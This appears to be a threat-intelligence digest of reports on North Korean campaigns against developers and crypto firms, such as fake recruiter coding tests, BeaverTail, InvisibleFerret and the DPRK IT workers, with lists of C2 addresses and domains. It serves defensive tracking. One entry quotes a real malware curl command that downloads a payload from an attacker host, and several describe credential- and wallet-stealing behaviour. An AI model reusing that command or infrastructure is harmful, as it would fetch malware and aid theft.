Date:: 2024-08-30 URL:: https://microsoft.com/en-us/security/blog/2024/08/30/north-korean-threat-actor-citrine-sleet-exploiting-chromium-zero-day/ https://bleepingcomputer.com/news/security/north-korean-hackers-exploit-chrome-zero-day-to-deploy-rootkit/ https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html https://nvd.nist.gov/vuln/detail/CVE-2024-7971 https://nvd.nist.gov/vuln/detail/CVE-2024-4947 https://nvd.nist.gov/vuln/detail/CVE-2024-5274 https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/ Tags:: Applejeus, Citrine Sleet, CVE Details::

Type confusion vulnerability in the V8 JavaScript
Citrine Sleet most commonly infects targets with the unique trojan malware it developed, AppleJeus, which collects information necessary to seize control of the targets’ cryptocurrency assets. The FudModule rootkit described in this blog has now been tied to Citrine Sleet as shared tooling with Diamond Sleet. Indicators::
voyagorclub.space

DeFied Expectations — Examining Web3 Heists

Date:: 2024-09-03 URL:: https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/ Tags:: RustBucket Details::

Crypto exchange heists typically involve a series of events that map to the Targeted Attack Lifecycle. Recent findings from Mandiant heist investigations have identified social engineering of developers via fake job recruiting with coding tests as a common initial infection vector. The following screenshots (Figure 1) are from a recent heist investigation where an engineer was contacted about a fake job opportunity via LinkedIn by a DPRK threat actor. After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user’s macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons.
Recently, Mandiant observed a similar recruiting theme which delivered a malicious PDF disguised as a job description for VP of Finance and Operations at a prominent crypto exchange. The malicious PDF dropped a second-stage malware known as RUSTBUCKET which is a backdoor written in Rust that supports file execution. The backdoor collects basic system information, communicates to a URL provided via the command-line, and in this instance persisted, via a Launch Agent disguised as Safari Update with a command-and-control (C2 or C&C) domain autoserverupdate.line.pm.
The following snippet shows example decrypted AWS EC2 SSM Parameters identified in AWS CloudTrail logs from a heist investigation. These decrypted SSM Parameters included the private keys, usernames, and passwords for an exchange’s production cryptocurrency wallets. Approximately one hour later the wallets were drained resulting in a loss of over $100 million. Indicators::

FBI: North Korea Aggressively Targeting Crypto Industry with Well-Disguised Social Engineering Attacks

Date:: 2024-09-03 URL:: https://ic3.gov/PSA/2024/PSA240903 Tags:: Details::

The FBI has observed the following list of potential indicators of North Korean social engineering activity:
Requests to execute code or download applications on company-owned devices or other devices with access to a company’s internal network.
Requests to conduct a pre-employment test or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
Offers of employment from prominent cryptocurrency or technology firms that are unexpected or involve unrealistically high compensation without negotiation.
Offers of investment from prominent companies or individuals that are unsolicited or have not been proposed or discussed previously.
Insistence on using non-standard or custom software to complete simple tasks easily achievable through the use of common applications (i.e. video conferencing or connecting to a server).
Requests to run a script to enable call or video teleconference functionalities supposedly blocked due to a victim's location.
Requests to move professional conversations to other messaging platforms or applications.
Unsolicited contacts that contain unexpected links or attachments. Indicators::

APT Lazarus: Eager Crypto Beavers, Video calls and Games

Date:: 2024-09-04 URL:: https://group-ib.com/blog/apt-lazarus-python-scripts/ Tags:: DPRK-CI Details::

Contagious Interview, BeaverTail, InvisibleFerret, FCCCall
Recent Python scripts, including the CivetQ and BeaverTail malware variants, along with their updated versions in Windows and Python releases
Campaign begins with a fictitious job interview, tricking job-seekers into downloading and running a Node.js project which contains the BeaverTail malware, which in turn delivers the Python backdoor known as InvisibleFerret. BeaverTail was first discovered by PANW researchers as a Javascript malware in November 2023, but recently a native macOS version of BeaverTail was discovered in July 2024.
Actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork,and others
The malicious Javascript code is buried within these repositories. The following are examples of a trojanized repository, where the node server/server.js command was added to the scripts property in package.json. Here, server/server.js serves as the initial entry point, which in turn loads the malicious script in middlewares/helpers/error.js. Indicators::
freeconference.io
mirotalk.net

Threat Assessment: North Korean Threat Groups

Date:: 2024-09-09 URL:: https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/ Tags:: Details::

Lazarus has been used in public reporting as an umbrella term for threat actors from the Democratic People's Republic of Korea (DPRK), commonly referred to as North Korea. However, many of these threat actors can be classified into different groups under the Reconnaissance General Bureau (RGB) of the Korean People's Army. Over the years, the RGB has revealed at least six threat groups:
Alluring Pisces (Bluenoroff)
Gleaming Pisces (Citrine Sleet)
Jumpy Pisces (Andariel)
Selective Pisces (TEMP.Hermit)
Slow Pisces (TraderTraitor)
Sparkling Pisces (Kimsuky) Indicators::

Fake recruiter coding tests target devs with malicious Python packages

Date:: 2024-09-10 URL:: https://reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python-packages Tags:: Pyperclip Details::

VMConnect, first identified in August 2023
New samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews. Furthermore, information gathered from the detected samples allowed us to identify one compromised developer and provided insights into an ongoing campaign, with attackers posing as employees of major financial services firms.
The malicious code was contained in altered pyperclip and pyrebase modules. The malicious code is present in both the init.py file and its corresponding compiled Python file (PYC) inside the pycache directory of respective modules.
Searching open source information for the name led us to a GitHub profile of the developer. After establishing contact with the developer, we confirmed that he had fallen victim to the malicious actor pretending to be a recruiter from Capital One in January, 2024. In an email exchange with ReversingLabs, he revealed that he had been contacted from a LinkedIn profile and provided with a link to the GitHub repository as a homework task. The developer was asked to find the bug, resolve it and push changes that addressed the bug. When the changes were pushed, the fake recruiter asked him to send screenshots of the fixed bug — to make sure that developer executed the project on his machine. Indicators::
Python_Skill_Assessment.zip
Python_Skill_Test.zip
Github:: ponpon262612
Capital One Skills Test

Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware

Date:: 2024-09-11 URL:: https://thehackernews.com/2024/09/developers-beware-lazarus-group-uses.html Tags:: Pyperclip Details::

Malicious code embedded within modified versions of legitimate PyPI libraries such as pyperclip and pyrebase.
init.py file and its corresponding compiled Python file (PYC) inside the pycache directory of respective modules
requiring job seekers to build a Python project shared in the form of a ZIP file within five minutes and find and fix a coding flaw in the next 15 minutes.
Capital One and Rookery Capital Limited Indicators::

Targeted attacks amid FBI Warnings

Date:: 2024-09-16 URL:: https://jamf.com/blog/jamf-threat-labs-observes-targeted-attacks-amid-fbi-warnings/ Tags:: zsh Details::

On September 3, 2024 the Federal Bureau of Investigations (FBI) released a public service announcement set to warn those in the Crypto Industry that the Democratic People's Republic of Korea (DPRK aka North Korea) has been targeting individuals by using clever social engineering techniques for the successful delivery of malware.
Humans have long been considered the weakest link in the cybersecurity chain, and attackers continue to exploit this vulnerability through increasingly sophisticated social engineering tactics. Social engineering schemes often target individuals through professional networking platforms, making users the first line of defense but also the most vulnerable.
The actors may also impersonate recruiting firms or technology companies backed by professional websites designed to make the fake entities appear legitimate.
Requests to conduct a pre-employment test or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
The other stage two malware that is downloaded (zsh_env) simply sets up persistence via the .zshrc configuration. This ensures that any time the user opens a zsh shell moving forward, the malware will also be executed. This is a technique that likely ends up being reliable given the attacker knows they’re targeting a developer who will likely use the Terminal, again causing the backdoor to be run in the background.
VisualStudioHelper acts as an automated infostealer, can operate as a standard backdoor when invoked by cron and communicates with wiresapplication[.]com.
zsh_env operates as a backdoor, does not automate any of the infostealer functionality, persists via the zshrc config file, and uses a command and control server at juchesoviet48[.]com. Indicators::
TestProject/SlackToCsv.csproj
taurihostmetrics[.]com
wiresapplication[.]com
zsh_env communicates with juchesoviet48[.]com
Project.zip (Coding Challenge)

An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader

Date:: 2024-09-17 URL:: https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/ Tags:: UNC2970, UNC4034 Details::

Mandiant Managed Defense has reported similar activity in 2022 attributed to UNC4034, which later got merged into UNC2970.
UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies. Mandiant has observed UNC2970 copy and tailor job descriptions to fit their respective targets.
UNC2970 engaged with the victim over email and WhatsApp and ultimately shared a malicious archive that is purported to contain the job description in PDF file format. The PDF file has been encrypted and can only be opened with the included trojanized version of SumatraPDF to ultimately deliver MISTPEN backdoor via BURNBOOK launcher.
Mandiant observed UNC2970 modify the open source code of an older SumatraPDF version as part of this campaign. This is not a compromise of SumatraPDF, nor is there any inherent vulnerability in SumatraPDF. Upon discovery, Mandiant alerted SumatraPDF of this campaign for general awareness.
UNC2970 relies on legitimate job description content to target victims employed in U.S. critical infrastructure verticals. The job description is delivered to the victim in a password-protected ZIP archive containing an encrypted PDF file and a modified version of an open-source PDF viewer application.
For example, under the Required Education, Experience, & Skills section, the original post mentions United States Air Force or highly comparable experience, while the malicious PDF omits this line. Another omitted line is under the Preferred Education, Experience, & Skills section, where the original job description includes Preferred location McLean, Virginia.
The backdoor reads configuration data from the file setup.bin if it exists within the same directory. The configuration data includes the sleep time and an ID. The backdoor sleeps for the configured time and sends the message Hi,I m just woke up! to its command-and-control (C2 or C&C) server. Indicators::
BAE_VICE President of Business Development.pdf An encrypted file containing both the PDF lure displayed to the user and the MISTPEN backdoor
libmupdf.dll PdfFilter.dll SumatraPDF.exe
This MISTPEN sample communicates over HTTP with the following Microsoft Graph URLs:
login.microsoftonline.com/common/oauth2/v2.0/token
graph.microsoft.com/v1.0/me/drive/root:/path/upload/hello/
graph.microsoft.com/v1.0/me/drive/root:/path/upload/world/
graph.microsoft.com/v1.0/me/drive/items/

Code of Conduct: DPRK’s Python-fueled intrusions into secured networks

Date:: 2024-09-17 URL:: https://elastic.co/security-labs/dprk-code-of-conduct Tags:: Pyperclip, ROT13 Details::

Investigating the DPRK’s strategic use of Python and carefully crafted social engineering, this publication sheds light on how they breach highly secure networks with evolving and effective cyber attacks.
The main PasswordManager.py file looks like the makings of a basic Python password manager application. Of course, as we noted above, the application imports two third-party modules (Pyperclip and Pyrebase) into this main script.
The script within the Pyperclip package exhibits clear signs of malicious behavior, using obfuscation techniques like ROT13 and Base64 encoding to hide its true intent. It identifies the operating system and adapts its actions accordingly, writing to disk and executing an obfuscated Python script in the system’s temporary directory. The script establishes communication with a remote server, enabling remote code execution (RCE) and allowing the attacker to send further commands. This carefully concealed process ensures the script runs stealthily, avoiding detection while maintaining effective C2 (Command and Control) over the infected machine.
This lure again masquerades as a Python coding challenge delivered under the guise of a job interview. Its Python code implementation matches exactly the code we’ve analyzed above, and based on description and filename, it matches the lure described by Mandiant as CovertCatch.
The next lure is different from the previous ones but matches the Python code implementation we have seen and written about previously. Last year, we brought to light the malware known as KandyKorn that targeted CryptoCurrency developers and engineers. Indicators::

Is Rookery Capital a scam?

Date:: 2024-09-17 URL:: https://reddit.com/r/Scams/comments/1f30stp/is_rookery_capital_limited_a_scam/ Tags:: Pyperclip Details::

Couple days ago I was reached by Mattiass Hansson on Telegram with a job offer. Then I got added to Rookery Capital Recruitment Slack channel and this started to look suspicious.
First of all I did go through a lot of recruitment processes but none of them was run through Slack. People on the Slack seems to be bots or fake personalities (ex. Emily Evelyn, Sonia Clark their profile images are stocks or rockstar pics). There is no information about the company online except registration in UK. They're unable to give a description of the position except some very vague words. They're build a sence of urgency in how they deal with me. Indicators::

Gleaming Pisces / AppleJeus Poisoned Python Packages Campaign Delivers PondRAT Linux and MacOS Backdoors

Date:: 2024-09-18 URL:: https://unit42.paloaltonetworks.com/gleaming-pisces-applejeus-poolrat-and-pondrat/ Tags:: Applejeus Details:: Linux and macOS backdoors via infected Python software packages PondRAT POOLRATWhen examining its code, we observed several similarities to the Linux RAT. This included the function names FConnectProxy and AcceptRequest, and similar code execution flow. In a 2021 report, CISA identified a macOS RAT dubbed prtspool, used as the final payload in one of the AppleJeus (CoinGoTrade) attack waves. Mandiant's analysis of the 3CX supply chain attack also mentioned this RAT family. They reported that attackers used the POOLRAT malware to compromise 3CX’s macOS build environment. ESET has also identified similarities between POOLRAT and a backdoor called BADCALL for Linux, also attributed to Gleaming Pisces. Figure 7 below shows the execution prevention of the POOLRAT macOS backdoor. Indicators:: FConnectProxy and AcceptRequest real-ids (versions 0.0.3 0.0.5) coloredtxt (version 0.0.2) beautifultext (version 0.0.1) minisound (version 0.0.2) curl --silent https://arcashop[.]org/boards.php?type=! --cookie oshelper_session=[REDACTED] --output /home/[REDACTED]/oshelper os_helper jdkgradle[.]com rebelthumb[.]net www.talesseries[.]com/write.php rgedist[.]com/sfxl.php KyPay Wallet Connections kupayupdate_stage2 prtspool

Mandiant: UNC5267 Staying a Step Ahead: Mitigating the DPRK IT Worker Threat

Date:: 2024-09-23 URL:: https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat Tags:: Applejeus, DPRK-IT, UNC5267 Details::

UNC5267 is not a traditional, centralized threat group. IT workers consist of individuals sent by the North Korean government to live primarily in China and Russia, with smaller numbers in Africa and Southeast Asia. Their mission is to secure lucrative jobs within Western companies, especially those in the U.S. tech sector.
Financial gain through illicit salary withdrawals from compromised companies
Maintaining long-term access to victim networks for potential future financial exploitation
Potential use of access for espionage or disruptive activity (though this hasn't been definitively observed) Indicators::
daniel-ayala[.]netlify[.]app
103[.]244[.]174[.]154 Cybernet (PK)
104[.]129[.]55[.]3 QuadraNet (US)
104[.]206[.]40[.]138 Eonix Corporation AstrillVPN (US)
104[.]223[.]97[.]2 QuadraNet (US)
104[.]223[.]98[.]2 QuadraNet (US)
104[.]243[.]33[.]74 ReliableSite[.]Net LLC (US)
104[.]250[.]148[.]58 GorillaServers AstrillVPN (US)
109[.]82[.]113[.]75 Mobily (SA)
113[.]227[.]237[.]46 China Unicom (CN)
119[.]155[.]190[.]202 Ufone (PK)
123[.]190[.]56[.]214 China Unicom (CN)
155[.]94[.]255[.]2 QuadraNet (US)
174[.]128[.]251[.]99 Sharktech AstrillVPN (US)
18[.]144[.]99[.]240 Amazon (US)
184[.]12[.]141[.]109 Frontier Communications (US)
192[.]119[.]10[.]67 24 Shells AstrillVPN (US)
192[.]119[.]11[.]250 24 Shells AstrillVPN (US)
192[.]74[.]247[.]161 Peg Tech AstrillVPN (US)
198[.]135[.]49[.]154 Majestic Hosting Solutions, LLC AstrillVPN (US)
198[.]2[.]228[.]20 Peg Tech AstrillVPN (US)
198[.]23[.]148[.]18 ColoCrossing (US)
199[.]115[.]99[.]34 Sharktech AstrillVPN (US)
204[.]188[.]232[.]195 Sharktech AstrillVPN (US)
207[.]126[.]89[.]11 Hurricane Electric (US)
208[.]68[.]173[.]244 Atlantic Metro Communications (US)
23[.]105[.]155[.]2 Leaseweb New York (US)
23[.]237[.]32[.]34 Fdcservers (US)
3[.]15[.]4[.]158 Amazon (US)
37[.]19[.]199[.]133 Datacamp Limited (US)
37[.]19[.]221[.]228 Datacamp Limited (US)
37[.]43[.]225[.]43 Mobily (SA)
38[.]140[.]49[.]92 Cogent Communications AstrillVPN (US)
38[.]42[.]94[.]148 Starry (US)
42[.]84[.]228[.]232 China Unicom (CN)
5[.]244[.]93[.]199 Mobily (SA)
50[.]39[.]182[.]185 Ziply Fiber (US)
51[.]39[.]228[.]134 Zain Saudi Arabia (SA)
54[.]200[.]217[.]128 Amazon (US)
60[.]20[.]1[.]234 China Unicom (CN)
66[.]115[.]157[.]242 Performive (US)
67[.]129[.]13[.]170 CenturyLink (US)
67[.]82[.]9[.]140 Optimum Online (US)
68[.]197[.]75[.]194 Optimum Online (US)
70[.]39[.]103[.]3 Sharktech AstrillVPN (US)
71[.]112[.]196[.]114 Verizon Fios Business (US)
71[.]112[.]196[.]115 Verizon Fios Business (US)
72[.]193[.]13[.]228 Cox Communications (US)
74[.]222[.]20[.]18 International AstrillVPN (US)
74[.]63[.]233[.]50 Limestone Networks AstrillVPN (US)
98[.]179[.]96[.]75 Cox Communications (US)

Dozens of Fortune 100 companies have unwittingly hired North Korean IT workers, according to report

Date:: 2024-09-23 URL:: https://therecord.media/major-us-companies-unwittingly-hire-north-korean-remote-it-workers Tags:: DPRK-IT, UNC5267 Details::

The goal is for workers to earn salaries at multiple companies — generating revenue for the North Korean government — and to gain pivotal access to U.S. tech firms that can be used for further cyberattacks or intrusions.
The remote workers “often gain elevated access to modify code and administer network systems,” Mandiant found, warning of the downstream effects of allowing malicious actors into a company’s inner sanctum. Indicators::

Contagious Interview: DPRK Threat Actors Lure Tech Industry Job Seekers to Install New Variants of BeaverTail and InvisibleFerret Malware

Date:: 2024-10-09 URL:: https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/ Tags:: DPRK-IT, DPRK-CI Details::

After exfiltrating collected data to the C2, BeaverTail attempts to download the Python programming language to the infected machine from the URL hxxp://<c2_server>:1224/pdown. Downloading Python is essential to successfully executing the InvisibleFerret backdoor payload, which is written in Python. This enables InvisibleFerret to be cross platform as well.
InvisibleFerret Installed by Fake MiroTalk Installer
Indicators::
95.164.17[.]24
185.235.241[.]208

Lazarus Group cluster (BeaverTail)

Date:: 2024-10-10 URL:: https://x.com/michalkoczwara/status/1844302222911476079?s=46&t=X7nkyw1CsOm8Btjy5lyX7w Tags:: DPRK-CI Details::

BeaverTail downloads a Python executable (p[.]zip) to the compromised machine from :1224/pdown.
Downloading Python is necessary to execute the InvisibleFerret backdoor payload, as it is written in Python. This enables InvisibleFerret to operate across multiple operating systems (Windows, Mac, and Linux). Indicators::
23.106.70[.]154:1244/pdown
23.106.253[.]194:1244/pdown
23.106.253[.]215:1244/pdown
23.106.253[.]221:1244/pdown
23.106.253[.]242:1244/pdown
p[.]zip

Bored BeaverTail Yacht Club – A Lazarus Lure

Date:: 2024-10-17 URL:: https://esentire.com/blog/bored-beavertail-yacht-club-a-lazarus-lure Tags:: DPRK-CI Details::

The user downloaded a malicious NFT marketplace project named nft_marketplace-main from a GitHub repository
Based on our investigation, it was determined that nft_marketplace-main was BeaverTail malware.
The NPM package masquerading as BeaverTail was downloaded and then opened in visual studio code; the malicious NPM package was installed via the NPM command-line, resulting in the execution of a JavaScript file 'test.js' being launched from the '.vscode' folder (Figure 3). Indicators::

Inside a North Korean Phishing Operation Targeting DevOps Employees

Date:: 2024-10-29 URL:: https://securityscorecard.com/blog/inside-a-north-korean-phishing-operation-targeting-devops-employees/ Tags:: DPRK-CI Details::

STRIKE also identified additional C2 servers related to the attack that share similar patterns with C2s discovered. The following is a geographical distribution of infected victims over port 1244 used to communicate to the C2.
This backdoor was delivered via a malicious Bitbucket repository that was controlled by the threat actor. In this case the backdoor was found in a NodeJS application that was present in the repository. The employee was targeted directly over LinkedIn offering a job related to the development of a Web3 gaming platform and that their skills matched what they were looking for. It is likely that this threat actor matched the skills present on the employee’s profile to a tailored repository. The threat actor used a compromised LinkedIn account belonging to an individual that is employed at an organization in the UK. This account has existed since 2010 so it’s certain that the account wasn’t created by the TA.
The obfuscated JS backdoor linked to this malicious repository communicated to a C2 server with the IP address of 147[.]124[.]214[.]129. This C2 is hosting other components that may be related to other attacks being conducted on tech workers abroad. This C2 server also downloaded a script that executes a payload that is base64 encoded and XORed as a result. It’s important to note that this script is intended to execute some form of payload once decoded as indicated by the execute statement. The script is loaded into a buffer after decrypting and executed on runtime.
At a high level the script performs the following actions against the target system:
Operating System Detection
Imports Win32crypt in attempt to decrypt stored passwords
Imports secretstorage library in Linux to retrieve encryption keys
Interacts with MacOS keychain to get encryption keys for Chrome, Opera, Brave or Yandex browsers
Focuses on exfiltrating login details and credit cards data stored.
This project is a POC for a Web3 eStore. Admins can register merchandise, and clients can buy using SOL and SPL token.
Take a look at the project and send me a document with:
1. Revise the project to ensure that the token name is automatically updated when the token address is entered while adding a new currency in the admin site. Once completed, please attach a recorded video link as confirmation.
1. Analysis of functions related to the public key BVmdx6PdToCmGcSPUaFCXzrzbrSzRrecbAXS7xgREdDq. Indicators::
bitbucket[.]org/techbittinker/web3-eco
147[.]124[.]214[.]129
:1244
BVmdx6PdToCmGcSPUaFCXzrzbrSzRrecbAXS7xgREdDq

BlueNoroff Hidden Risk Threat Actor Targets Macs with Fake Crypto News and Novel Persistence

Date:: 2024-11-07 URL:: https://sentinelone.com/labs/bluenoroff-hidden-risk-threat-actor-targets-macs-with-fake-crypto-news-and-novel-persistence/ Tags:: BlueNoroff, RustBucket, zsh Details::

SentinelLabs has observed a suspected DPRK threat actor targeting Crypto-related businesses with novel multi-stage malware.
We assess with high confidence that the same actor is responsible for earlier attacks attributed to BlueNoroff and the RustDoor/ThiefBucket and RustBucket campaigns.
SentinelLabs observed the use of a novel persistence mechanism abusing the Zsh configuration file zshenv.
The campaign, which we dubbed ‘Hidden Risk’, uses emails propagating fake news about cryptocurrency trends to infect targets via a malicious application disguised as a PDF file. Indicators::
Hidden Risk Behind New Surge of Bitcoin Price
Altcoin Season 2.0-The Hidden Gems to Watch
New Era for Stablecoins and DeFi, CeFi
23.254.253[.]75, 45.61.128[.]122, 45.61.135[.]105, 45.61.140[.]26, 144.172.74[.]23, 144.172.74[.]141, 172.86.108[.]47, 216.107.136[.]10
analysis.arkinvst[.]com, appleaccess[.]pro, arkinvst[.]com, atajerefoods[.]com, buy2x[.]com, calendly[.]caladan[.]video, cardiagnostic[.]net, cmt[.]ventures, community.edwardcaputo[.]shop, community.kevinaraujo[.]shop, community.selincapital[.]com, customer-app[.]xyz, delphidigital[.]org, doc.solanalab[.]org, dourolab[.]xyz, drogueriasanjose[.]net, edwardcaputo[.]shop, email.sellinicapital[.]com, evalaskatours[.]com, happyz[.]one, hwsrv-1225327.hostwindsdns[.]com, info.ankanimatoka[.]com, info.customer-app[.]xyz, kevinaraujo[.]shop, maelstromfund[.]org, maelstroms[.]fund, matuaner[.]com, mc.tvdhoenn[.]net, meet.caladan[.]video, meet.caladangroup[.]xyz, meet.hananetwork[.]video, meet.selinicapital[.]info, meet.selinicapital[.]online, meet.selinicapital[.]xyz, meet.sellinicapital[.]com, meeting.sellinicapital[.]com, meeting.zoom-client[.]com, mg21.1056[.]uk, nodnote.com, online.selinicapital[.]info, online.zoom-client[.]com, panda95sg[.]asia, pixelmonmmo[.]net, presentations[.]life, selincapital[.]com, selinicapital[.]info, selinicapital[.]network, selinicapital[.]online, sellinicapital[.]com, sendmailed[.]com, sendmailer[.]org, shh5.baranftw[.]xyz, tvdhoenn[.]net, verify.selinicapital[.]info, versionupdate.dns[.]army, www.buy2x[.]com, www.delphidigital[.]org, www.frameworks[.]ventures, www.happyz[.]one, www.huspot[.]blog, www.maelstromfund[.]org, www.panda95sg[.]asia, www.prismlab[.]xyz, www.sellinicapital[.]com, www.sendmailed[.]com, www.sendmailer[.]org, www.yoannturp[.]xyz, xu10.1056[.]uk, zoom-client[.]com

Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure Pt.2

Date:: 2024-11-14 URL:: https://esentire.com/blog/bored-beavertail-invisibleferret-yacht-club-a-lazarus-lure-pt-2 Tags:: DPRK-CI Details::

A ZIP file named 'task-space-eshop-aeea6cc51a7c.zip' was found in the user's download directory.
Probable that the victim downloaded the zip from a BitBucket project named eshop (Figure 1).
The commits to eshop occurred roughly five days after a job posting for a freelancer was published on a freelance job board.
The job was posted by a user named francesco zaid on the www.freelancermap[.]com (Figure 3).
The server.js file is used as an entry point to load the file located in backend/middlewares/helpers/error.js, which facilitates further malicious activities on the victim machine such as: steal saved login credentials in the browsers; collect system information; enumerates crypto wallet extensions in the targeted browsers; and, steal configuration data from crypto wallets like Exodus and Solana.
This JavaScript file (error.js) is highly obfuscated and after analysis it was determined to be a component for the Beavertail malware (Figure 5).
After the JavaScript file is loaded, it uses a cURL command to download InvisibleFerret malware components from a command and control (C2) server; in this case the C2 was located at 185[.]235[.]241[.]208[:]1224.
BeaverTail then downloads the initial Python script of InvisibleFerret.
It is saved on the victim machine as .sysinfo file in the victim’s home directory (Figure 6).
Once the fingerprinting activity is concluded, it is packaged up and exfiltrated via HTTP POST request to hxxp://185.235.241[.]208:1224/keys (Figure 12).
The C2 IP address is de-obfuscated by shifting the first nine characters to the end of the string then base64 decoding the set.
On Windows systems, the main backdoor client is initiated alongside a keylogger and clipboard stealer which utilizes the pyHook, pythoncom and pyperclip Python libraries (Figure 13)
Captured keystrokes and clipboard data are written to the global e_buf variable then sent back to the C2 (via TCP connection to 185.235.241[.]208:2245) when the ssh_clip command is called within the backdoor session.
in_pk: Checks if a string contains a private key by searching for specific hexadecimal patterns that match typical private key lengths.
ismnemonic: Determines if a string contains a valid mnemonic phrase by checking for typical word counts and validating the phrase.
is_exceptFile: Checks if a file name has an extension that should be excluded from processing.
is_exceptPath: Checks if a path name matches any directories that should be excluded.
is_pat: Checks if a file name contains specific patterns related to environment variables and other sensitive files
Filenames are prepended with the current time and the hostname is prepended with the subid 29, as seen in Figure 15. Indicators::
185.235.241[.]208:1224/uploads

Two sample URLs recently used to target Comma3 Ventures and Castle Island Ventures

Date:: 2024-11-14 URL:: https://x.com/1ZRR4H/status/1856985633153053060 Tags:: SquidSquad Details::

Two sample URLs recently used to target Comma3 Ventures and Castle Island Ventures in the meetings campaign. Indicators::
comma3.biz-meeting.site/join/THe-BfVv-VuK
castleisland.sky-meeting.com/business/private/dQF-uWpG-hjJ

Chainalysis: $2.2 Billion Stolen from Crypto Platforms in 2024, but Hacked Volumes Stagnate Toward Year-End as DPRK Slows Activity Post-July

Date:: 2024-12-19 URL:: https://chainalysis.com/blog/crypto-hacking-stolen-funds-2025/ Tags:: Money Laundering Details::

Note that, in last year’s report, we published that the DPRK stole $1.0 billion across 20 hacks. Upon further investigation, we determined that certain large hacks we had previously attributed to the DPRK are likely no longer related, hence the decrease to $660.50 million. However, the number of incidents remains the same, as we identified other smaller hacks attributed to the DPRK. We aim to constantly re-evaluate our assessment of DPRK-linked hacking events as we acquire new on-chain and off-chain evidence. Indicators::

Microsoft shares latest intelligence on North Korean and Chinese threat actors at CYBERWARCON

Date:: 2024-12-22 URL:: https://microsoft.com/en-us/security/blog/2024/11/22/microsoft-shares-latest-intelligence-on-north-korean-and-chinese-threat-actors-at-cyberwarcon/ Tags:: DPRK-IT Details::

Sapphire Sleet: Masquerading as a venture capitalist
Sapphire Sleet: Posing as recruiters
Ruby Sleet: Sophisticated phishing targeting satellite and weapons systems-related targets
North Korean IT workers: The triple threat
Facilitators complicate tracking of IT worker ecosystem
Fake profiles and portfolios with the aid of AI Indicators::

FBI, DC3, and NPA Identification of North Korean Cyber Actors, Tracked as TraderTraitor, Responsible for Theft of $308 Million USD from Bitcoin.DMM.com

Date:: 2024-12-23 URL:: https://fbi.gov/news/press-releases/fbi-dc3-and-npa-identification-of-north-korean-cyber-actors-tracked-as-tradertraitor-responsible-for-theft-of-308-million-from-bitcoindmmcom Tags:: TraderTraitor, UNC4899, Money Laundering Details::

The Federal Bureau of Investigation, Department of Defense Cyber Crime Center, and National Police Agency of Japan are alerting the public to the theft of cryptocurrency worth $308 million U.S. dollars from the Japan-based cryptocurrency company DMM by North Korean cyber actors in May 2024. The theft is affiliated with TraderTraitor threat activity, which is also tracked as Jade Sleet, UNC4899, and Slow Pisces. TraderTraitor activity is often characterized by targeted social engineering directed at multiple employees of the same company simultaneously.
In late March 2024, a North Korean cyber actor, masquerading as a recruiter on LinkedIn, contacted an employee at Ginco, a Japan-based enterprise cryptocurrency wallet software company. The threat actor sent the target, who maintained access to Ginco’s wallet management system, a URL linked to a malicious Python script under the guise of a pre-employment test located on a GitHub page. The victim copied the Python code to their personal GitHub page and was subsequently compromised.
After mid-May 2024, TraderTraitor actors exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system. In late-May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack. The stolen funds ultimately moved to TraderTraitor-controlled wallets.
The FBI, National Police Agency of Japan, and other U.S. government and international partners will continue to expose and combat North Korea’s use of illicit activities—including cybercrime and cryptocurrency theft—to generate revenue for the regime. Indicators::

OtterCookie, a new malware used by Contagious Interview

Date:: 2024-12-24 URL:: https://jp.security.ntt/tech_blog/contagious-interview-ottercookie Tags:: DPRK-CI Details::

Since around November 2024, SOC has observed the execution of malware other than BeaverTail and InvisibleFerret in the Contagious Interview campaign
We call the newly observed malware OtterCookie and have investigated it
In this article, we will introduce OtterCookie, its execution flow and detailed behavior.
The OtterCookie observed in September already has a function to steal keys related to cryptocurrency wallets
For example, the checkForSensitiveData function checks Ethereum private keys using regular expressions
In the November OtterCookie, this is achieved by remote shell commands. Indicators::
45[.]159.248.55
zkservice[.]cloud
w3capi[.]marketing
payloadrpc[.]com

2025

North Korea-nexus Golang Backdoor/Stealer from Contagious Interview campaign

Date:: 2025-01-04 URL:: https://dmpdump.github.io/posts/NorthKorea_Backdoor_Stealer/ Tags:: DPRK-CI Details::

Golang backdoor/stealer -> fake chrome updater
Victims were sent a link to sites impersonating the legitimate Willo candidate screening site. The fake sites eventually displayed a fake error and provided users with a malicious fix, such as the following command. The victims are lured into copying/pasting the command on their devices, triggering the download and installation of the payload.
This ZIP file contains artifacts to target Windows, Mac, and Linux, which is consistent with the multi-platform targeting of this threat actor and the use of cross-platform languages such as Golang. I’ll focus on the artifacts affecting Mac users. The script executed in the “fake fix” lure is likely ffmpeg.sh. This shell script triggers the download, execution, and persistence of the payload, along with a Mach-O app. Indicators::
ffmpeg.sh
216.74.123[.]191:8080
api.jz-aws[.]info/public/images/
ChromeUpdateAlert.app

Operation 99: North Korea’s Cyber Assault on Software Developers

